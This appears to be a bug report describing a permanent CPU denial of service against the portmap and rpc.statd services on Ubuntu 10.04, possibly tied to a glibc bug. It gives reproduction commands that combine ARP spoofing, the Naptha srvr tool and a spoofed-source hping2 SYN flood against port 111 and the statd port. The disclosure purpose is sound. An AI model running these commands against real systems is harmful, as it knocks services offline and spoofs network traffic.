I’m investigating a Permanent CPU DoS resulting from a TCP flood attack against the TCP ports bound to the Portmap and RPC.STATD services in Ubuntu 10.04. I’ve found a similar issue on RedHat and it appears the vulnerability/bug is in glibc (https://bugzilla.redhat.com/show_bug.cgi?id=702300). However, I wasn't able to find a similar bug in Ubuntu. The cause may be different, but it appears similar.
The glibc version installed on my Ubuntu 10.04 server is “libglib2.0-0 2.24.1-0ubuntu1”.
To reproduce, download the following tools from the internet and execute the following commands:
1. arpspoof -i eth1 -t <ubuntu-ip-address> <source-spoof-ip-addr>
2. srvr -SAa -i eth1 <source-spoof-ip-addr> [srvr is part of the Naptha tool]
3. hping2 <ubuntu-ip-address> -p <port-number> -S -a <source-spoof-ip-addr> -i u10000 –q
Note: portnumber is 111 for portmap and the port dynamically bound to rpc.statd (via netstat -lnup | grep rpc.statd)